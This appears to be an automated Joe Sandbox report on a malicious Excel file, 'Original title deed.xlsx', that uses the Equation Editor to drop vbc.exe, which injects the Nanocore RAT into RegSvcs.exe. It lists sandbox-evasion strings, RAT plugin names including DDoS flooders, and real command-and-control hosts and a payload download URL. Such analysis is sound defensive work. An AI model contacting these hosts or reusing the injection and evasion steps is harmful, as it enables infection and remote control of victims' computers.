Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2240	Thread sleep time: -300000s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2672	Thread sleep time: -103013s >= -30000s	Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 5_2_004C0BB6 GetSystemInfo,

5_2_004C0BB6

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 103013	Jump to behavior
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\Public\vbc.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\Public\vbc.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 420000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 422000	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe base: 7EFDE008	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe			Jump to behavior

Source: RegSvcs.exe, 00000005.00000002.2598434168.000000000283D000.00000004.00000001.sdmp	Binary or memory string: Program ManagerH
Source: RegSvcs.exe, 00000005.00000002.2597735291.0000000000C50000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000005.00000002.2597735291.0000000000C50000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: RegSvcs.exe, 00000005.00000002.2597735291.0000000000C50000.00000002.00000001.sdmp	Binary or memory string: !Progman
Source: RegSvcs.exe, 00000005.00000002.2597692834.00000000008B3000.00000004.00000020.sdmp	Binary or memory string: Program Manager- Original title deed - Original title deed
Source: RegSvcs.exe, 00000005.00000002.2598434168.000000000283D000.00000004.00000001.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2599211155.000000000387F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 5.2.RegSvcs.exe.2100000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3940110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3887649.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3883020.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3883020.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2104629.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2100000.13.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: RegSvcs.exe, 00000005.00000002.2597919023.0000000002200000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
Source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
Source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
Source: RegSvcs.exe, 00000005.00000002.2598186375.0000000002691000.00000004.00000001.sdmp	String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000005.00000002.2597850360.0000000002100000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2597305465.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2599211155.000000000387F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2399354927.00000000036B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2360, type: MEMORY
Source: Yara match	File source: 5.2.RegSvcs.exe.2100000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3940110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3887649.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3883020.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.3883020.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2104629.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vbc.exe.3940110.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.RegSvcs.exe.2100000.13.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_004C2626 bind,		5_2_004C2626
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe	Code function: 5_2_004C25F3 bind,		5_2_004C25F3

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Access Token Manipulation1	Masquerading111	Input Capture11	Security Software Discovery21	Remote Services	Input Capture11	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Process Injection312	Disable or Modify Tools11	LSASS Memory	Process Discovery2	Remote Desktop Protocol	Archive Collected Data11	Exfiltration Over Bluetooth	Non-Standard Port1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Extra Window Memory Injection1	Virtualization/Sandbox Evasion21	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Ingress Tool Transfer13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection312	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Non-Application Layer Protocol2	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	System Information Discovery4	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Application Layer Protocol122	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Hidden Files and Directories1	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Obfuscated Files or Information31	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing13	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Extra Window Memory Injection1	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Original title deed.xlsx	6%	Metadefender		Browse
Original title deed.xlsx	17%	ReversingLabs	Document-Office.Trojan.Heuristic

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\nd[1].exe	18%	Virustotal		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
5.2.RegSvcs.exe.2100000.13.unpack	100%	Avira	TR/NanoCore.fadte		Download File
5.2.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
79.134.225.26	8%	Virustotal		Browse
79.134.225.26	0%	Avira URL Cloud	safe
nassiru1166main.ddns.net	1%	Virustotal		Browse
nassiru1166main.ddns.net	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe	3%	Virustotal		Browse
http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
myhostisstillgood11.zapto.org	172.245.45.28	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
79.134.225.26	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
nassiru1166main.ddns.net	true	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://myhostisstillgood11.zapto.org/dashboard/docs/images/nd.exe	true	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.%s.comPA	RegSvcs.exe, 00000005.00000002.2599722592.0000000004F80000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	RegSvcs.exe, 00000005.00000002.2599722592.0000000004F80000.00000002.00000001.sdmp	false		high
http://www.day.com/dam/1.0	A830D3DD.emf.0.dr	false		high
https://github.com/unguest	vbc.exe	false		high
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	vbc.exe, 00000004.00000002.2397412433.00000000026EB000.00000004.00000001.sdmp	false		high
https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty	vbc.exe.2.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.134.225.26	unknown	Switzerland		6775	FINK-TELECOM-SERVICESCH	true
172.245.45.28	myhostisstillgood11.zapto.org	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	402636
Start date:	03.05.2021
Start time:	10:41:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Original title deed.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
